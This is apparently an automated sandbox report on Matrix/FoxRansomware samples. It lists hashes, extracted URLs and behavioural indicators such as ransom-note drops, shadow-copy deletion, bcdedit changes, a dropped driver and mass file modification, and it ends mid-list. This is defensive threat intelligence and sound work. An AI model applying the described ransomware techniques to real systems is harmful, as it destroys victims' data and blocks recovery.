Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
34s -
max time network
37s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
13-02-2024 05:15
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20231215-en
General
-
Target
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
-
Size
1.2MB
-
MD5
907636b28d162f7110b067a8178fa38c
-
SHA1
048ae4691fe267e7c8d9eda5361663593747142a
-
SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
-
SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
-
SSDEEP
24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#CORE_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\js\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ko-kr\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATER\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Java\jre-1.8\lib\cmm\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hu-hu\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-si\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sl-si\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hu-hu\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\Microsoft Office\root\Office16\OneNote\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 6508 bcdedit.exe 5468 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 156 4900 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS j3MxuEwf64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" j3MxuEwf64.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 3 IoCs
pid Process 1828 NWHeArfD.exe 5780 j3MxuEwf.exe 6252 j3MxuEwf64.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 6824 takeown.exe -
resource yara_rule behavioral8/files/0x000600000002322e-8578.dat upx behavioral8/memory/5780-8581-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral8/memory/5780-14385-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: j3MxuEwf64.exe File opened (read-only) \??\Y: j3MxuEwf64.exe File opened (read-only) \??\H: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\A: j3MxuEwf64.exe File opened (read-only) \??\B: j3MxuEwf64.exe File opened (read-only) \??\K: j3MxuEwf64.exe File opened (read-only) \??\Z: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\V: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\H: j3MxuEwf64.exe File opened (read-only) \??\T: j3MxuEwf64.exe File opened (read-only) \??\X: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\L: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\I: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\Z: j3MxuEwf64.exe File opened (read-only) \??\L: j3MxuEwf64.exe File opened (read-only) \??\S: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\K: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\E: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\G: j3MxuEwf64.exe File opened (read-only) \??\S: j3MxuEwf64.exe File opened (read-only) \??\W: j3MxuEwf64.exe File opened (read-only) \??\Y: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\W: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\N: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\Q: j3MxuEwf64.exe File opened (read-only) \??\O: j3MxuEwf64.exe File opened (read-only) \??\P: j3MxuEwf64.exe File opened (read-only) \??\U: j3MxuEwf64.exe File opened (read-only) \??\V: j3MxuEwf64.exe File opened (read-only) \??\T: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\R: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\J: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\N: j3MxuEwf64.exe File opened (read-only) \??\X: j3MxuEwf64.exe File opened (read-only) \??\Q: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\G: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\I: j3MxuEwf64.exe File opened (read-only) \??\J: j3MxuEwf64.exe File opened (read-only) \??\E: j3MxuEwf64.exe File opened (read-only) \??\R: j3MxuEwf64.exe File opened (read-only) \??\U: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\P: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\O: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\M: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 155 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\hQne0weC.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-180.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\System\VEN2232.OLB 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\ui-strings.js 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GARAIT.TTF 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\ui-strings.js 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\zh-TW.pak 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\psfont.properties.ja 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART4.BDR 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\main-selector.css 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\lcms.md 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress-indeterminate.gif 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial-pl.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\ui-strings.js 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\Logo.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019VL_MAK_AE-ul-phn.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Retail-pl.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\ui-strings.js 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\main.css 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\#CORE_README#.rtf 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\ui-strings.js 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\currency.data 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Java\jre-1.8\COPYRIGHT 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\CardViewIcon.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\files_icons.png 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_KMS_ClientC2R-ppd.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-ul-oob.xrm-ms 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened for modification 